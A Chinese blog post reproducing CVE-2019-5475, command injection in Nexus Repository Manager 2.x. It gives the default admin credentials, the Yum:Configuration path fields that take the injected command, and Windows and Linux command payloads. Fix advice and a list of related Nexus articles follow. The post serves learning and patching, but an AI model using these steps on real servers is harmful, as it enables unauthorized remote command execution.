Nexus Repository Manager2.x Yum:Configuration RCE 复现渗透测试

最新推荐文章于 2024-03-05 16:26:39 发布
最新推荐文章于 2024-03-05 16:26:39 发布
阅读量254 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118024126
版权

简介

nexus Repository Manager OSS是可以搭建一个远程的maven私服一种仓库工具,可以用来管理jar包和对应的依赖关系。但低版本存在默认口令登录,登录后台可进行任意命令执行,同时更低版本存在未授权访问

影响版本
Nexus Repository Manager OSS <= 2.14.13
Nexus Repository Manager Pro <= 2.14.13
漏洞编号:CVE-2019-5475

漏洞复现

默认口令登录 rce
1.使用口令 admin/admin123 登录系统

2.找到漏洞位置
Administrator - Capabilities - Yum:Configuration - Settings

3.在path of “createpo” 或者 path of “mergerepo” 输入命令执行

# windos
C:\\Windows\\System32\\cmd.exe /k dir&

# linux
/bin/bash -c id /createrepo

4.点击save后,等待执行成功提示后点击Status 查看命令执行回显

可进一步弹shell

修复建议

修复弱口令 升级至安全版本

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关!
烽铃子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-15012 —— Nexus Repository Manager 2 目录遍历漏洞
战神/calmness的博客
12-10 404
目录 Nexus Repository Manager 2组件介绍 漏洞描述 影响版本 过程 修复建议 CVE-2020-15012 | Nexus Repository Manager 2 目录遍历漏洞 Nexus Repository Manager 2组件介绍 Sonatype Nexus Repository Manager 2(NXRM)是美国Sonatype公司的一款Maven仓库管理器,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建Maven 仓库私服,在代理远程
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
公众号shadow sock7
04-02 6184
参考 https://support.sonatype.com/hc/en-us/articles/360044882533 https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA 漏洞描述 XSS就算了。 RCE: an attacker with any type of account on NXRM to execute arbitrary ...
Nexus Repository Manager 3 RCE(CVE-2019-7238)
公众号shadow sock7
02-13 3559
参考: https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 https://mp.weixin.qq.com/s/...
nexus2.x windows
chijie6848的博客
11-12 346
本文主要讲述 基于windows使用nexus2.x构建maven私服仓库 下载地址 https://help.sonatype.com/repomanager2/download 个人使用版本推荐 Nexus Repository Manager 2 OSS,因为...
Nexus2 yum插件RCE漏洞复现(CVE-2019-5475)
黑白的博客
12-05 402
声明 好好学习,天天向上 漏洞描述 最近hackerone才公开了Nexus Repository Manager 2.X漏洞细节,该漏洞默认存在部署权限账号,成功登录后可使用“createrepo”或“mergerepo”自定义配置,可触发远程命令执行漏洞 影响范围 Nexus Repository Manager OSS <= 2.14.13 Nexus Repository Manager Pro <= 2.14.13 限制:admin权限才可触发漏洞 复现过程 下载 https://do
Nexus Repository Manager OSS 2.14.21
02-22
Nexus Repository OSS is distributed with Sencha Ext ...Nexus Repository Manager 2 OSS is a repository manager which can be freely used and is distributed under the Eclipse Public License (EPL Version 1).
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus3.x官方手册Documention-Repository Manager 3.pdf
12-11
nexus官方版关于3.x版本的documention,pdf版本,带目录,很好用。虽然是英文,但用于api的开发和理解还是够用。
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
repository.xycl.addons2:使用Python 3的Kodi的重新发布
03-30
标题中的"repository.xycl.addons2:使用Python 3的Kodi的重新发布"表明这是一个针对Kodi平台的第三方插件仓库,它已经更新以支持Python 3编程语言。Kodi是一款开源媒体中心软件,允许用户组织和播放各种多媒体内容。...
Nexus Repository Manager的使用
08-02
Nexus Repository Manager的使用Nexus Repository Manager的使用
Nexus2 yum插件RCE漏洞(CVE-2019-5475)复现
锋刃科技的博客
12-06 555
漏洞概述、 hackerone公开了Nexus Repository Manager 2.X漏洞细节,该漏洞默认存在部署权限账号,成功登录后可使用“createrepo”或“mergerepo”自定义配置,可触发远程命令执行漏洞 影响版本 Nexus Repository Manager OSS <= 2.14.13 Nexus Repository Manager Pro <= 2.14.13 限制:admin权限才可触发漏洞 环境搭建 N...
构建Java本地仓库(构件库)——Nexus OSS
新哥依旧灿烂
02-17 7361
软件开发到一定程度,开始进行构件级别的共享。这里以Java构建为例,即共享Jar包。 1、依赖管理 Java项目比较流行的依赖管理软件为Maven和Ivy,此处不再做展开,可分别参考以下链接: Maven:http://maven.apache.org/ Ivy:https://ant.apache.org/ivy/ Maven不仅仅是一个依赖管理,他还能帮助你完成自动测试、发布、部署等
CVE-2019-5475/CVE-2019-15588:nexus 2 yum插件RCE
公众号shadow sock7
09-09 736
Nexus 2下载: https://download.sonatype.com/nexus/professional-bundle/nexus-professional-2.14.13-01-bundle.tar.gz
使用Nexus2.x搭建Maven私服及上传下载地址
祥哥
11-18 281
https://help.sonatype.com/repomanager2/download/download-archives---repository-manager-oss
Nexus Repository OSS admin账号或普通账号修改密码
iaiti的专栏
04-14 1854
所使用的是比较旧的系统,Nexus Repository Manager OSS 2.14.5-02,默认的管理员账密是admin,admin123。 如何修改管理员账密呢?
Maven学习—Nexus2私服配置
飞鸽FlyGo-把自己作为一款产品来打磨,提升产品的体验,锻造出最好的自己。
03-31 3779
Maven学习—Nexus2私服配置
Nexus Repository的搭建
最新发布
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
03-05 1781
Nexus Repository用于管理maven的jar包。java开发程序员每天都在使用,但是自己搭建或者管理的就很少。除非你是系统架构师。因为这一套东西,基本是搭建一次就不需要人来搭建了,日后打开界面维护的机会也很少,我们只需要将开发的一些jar包发布的maven仓库。
Sonatype Nexus Repository Manager OSS仓库管理私服(一)——搭建私服
热门推荐
野猿新一
09-03 2万+
nexus有收费版和开源免费版,其中的Nexus Repository Manager OSS是开源免费的,其功能基本满足我们的需求,所以本次搭建采用该版本。 下载 首先在Nexus Repository Manager OSS简介页面可以看到一些简介,在这里可以跳转到下载页面 Nexus目前支持OS X、Windows和Unix三种平台的安装 由于是在本地电脑搭建,所以我这里选择...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值